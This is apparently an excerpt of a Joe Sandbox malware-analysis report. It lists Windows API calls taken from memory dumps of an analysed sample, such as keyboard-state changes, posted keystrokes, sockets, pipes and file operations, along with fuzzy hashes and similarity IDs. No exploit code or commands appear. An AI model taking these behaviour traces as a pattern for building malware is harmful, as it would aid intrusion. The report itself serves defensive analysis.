• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 00C5B6E0
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5B6F5
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5B756
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C5B782
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C5B79F
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C5B7DE
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C5B7FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C25F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C257E3
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C2585E
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C25879
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C2589F
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00C25F16,00000000,?,?,?,?,?,?,?,?,?,00C25F16,?), ref: 00C258BE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00C25F16,00000000,?,?,?,?,?,?,?,?,?,00C25F16,?), ref: 00C258F7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C130BB
                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00C130C3
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C13151
                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00C1317C
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C131D1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C71B6F
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C71B7E
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C71C26
                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C71C56
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5D7CD,?), ref: 00C5E714
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5D7CD,?), ref: 00C5E72D
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C5D7F0
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5D82A
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5D8B0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5D8C6
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00C5D90C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C838B8
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C838EB
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C83920
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C83952
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C8397C
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C8398D
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C839A7
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C580D0
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C580F6
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C580F9
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58117
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C58120
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C58145
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58153
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C581A9
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C581CF
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C581D2
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00C581F3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 00C581FC
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C58216
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58224
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C60E99
                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60ED5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C60F6D
                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60FA8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C84BB0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C84BBD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C84BC8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C84BD7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C84BE3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C2DB23: _free.LIBCMT ref: 00C2DB4C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBAD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBB8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBC3
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC17
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC22
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC2D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC38
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5E328
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C5E32F
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5E345
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C5E34C
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5E390
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C5E36D
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00C61322
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C61334
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C61342
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C61350
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C6135F
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C6136F
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00C61376
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C7281D
                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C7283E
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C7284F
                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C72938
                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C728E9
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5433E: _strlen.LIBCMT ref: 00C54348
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C6F669), ref: 00C73C9D
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00C72992
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                            • Opcode ID: 607d6b1a17d55a4d4f2a2260b2ee12c591de2320d1bfb20f58f62dca3293be22
                                                                                                                                                                                                                                                                            • Instruction ID: e6622472750a4f20e1d80f4b95af856fc10b33b535d89f7639637b04ec077b4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 607d6b1a17d55a4d4f2a2260b2ee12c591de2320d1bfb20f58f62dca3293be22
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECB1B435504301AFD324DF24C885F2ABBE5AF84318F54859CF56A4B2E2DB71EE85CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C2042A
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C20446
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C2045D
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C2047B
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C20492
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C204B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                            • Instruction ID: bdbfa788b1600daf940c527e2f22301b3cd13ccace3618520468ab08620b7a34
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F81FB72600B259BD720EE69EC81B6EB3A9AF44320F34812BF521D7A93E770DE409754
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C18649,00C18649,?,?,?,00C267C2,00000001,00000001,8BE85006), ref: 00C265CB
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C267C2,00000001,00000001,8BE85006,?,?,?), ref: 00C26651
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C2674B
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26758
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26761
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C26786
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2850d91c33c7272e789a8d97a4e1eefda2a9b8fc2760d1729496b62a38a30996
                                                                                                                                                                                                                                                                            • Instruction ID: f6330a4318be0416631b68815478ab04ff14a15c136bce36748b5da618781b26
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2850d91c33c7272e789a8d97a4e1eefda2a9b8fc2760d1729496b62a38a30996
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A451FF72610226AFEB258E64EC85EAF77AAEF40B14F140268FC25D6580EB34DD5096B0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
